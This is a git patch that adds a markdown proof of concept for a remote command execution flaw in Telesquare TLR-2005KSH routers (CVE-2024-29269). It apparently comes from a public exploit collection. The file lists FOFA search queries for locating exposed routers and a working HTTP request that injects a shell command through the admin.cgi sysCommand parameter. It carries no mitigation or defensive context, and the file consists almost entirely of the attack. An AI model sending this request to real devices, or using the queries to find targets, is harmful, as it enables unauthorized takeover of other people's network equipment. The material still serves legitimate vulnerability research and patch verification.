From 9e55d0caed266c40b0cc0efdce0fc17122fee671 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 12 Apr 2024 20:20:47 +0800 Subject: [PATCH] =?UTF-8?q?Create=20Telesquare=E8=B7=AF=E7=94=B1=E5=99=A8R?= =?UTF-8?q?CE(CVE-2024-29269).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Telesquare路由器RCE(CVE-2024-29269).md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 Telesquare路由器RCE(CVE-2024-29269).md diff --git a/Telesquare路由器RCE(CVE-2024-29269).md b/Telesquare路由器RCE(CVE-2024-29269).md new file mode 100644 index 0000000..89715cc --- /dev/null +++ b/Telesquare路由器RCE(CVE-2024-29269).md @@ -0,0 +1,16 @@ +## Telesquare路由器RCE(CVE-2024-29269) + +## fofa +``` +title="Login to TLR-2005KSH" +app="TELESQUARE-TLR-2005KSH" +``` + +## poc +``` +GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1 +Host: x.x.x.x:8085 + +``` + +![image](https://github.com/wy876/POC/assets/139549762/3fc91aca-15c0-41e7-94b0-06954993c86b)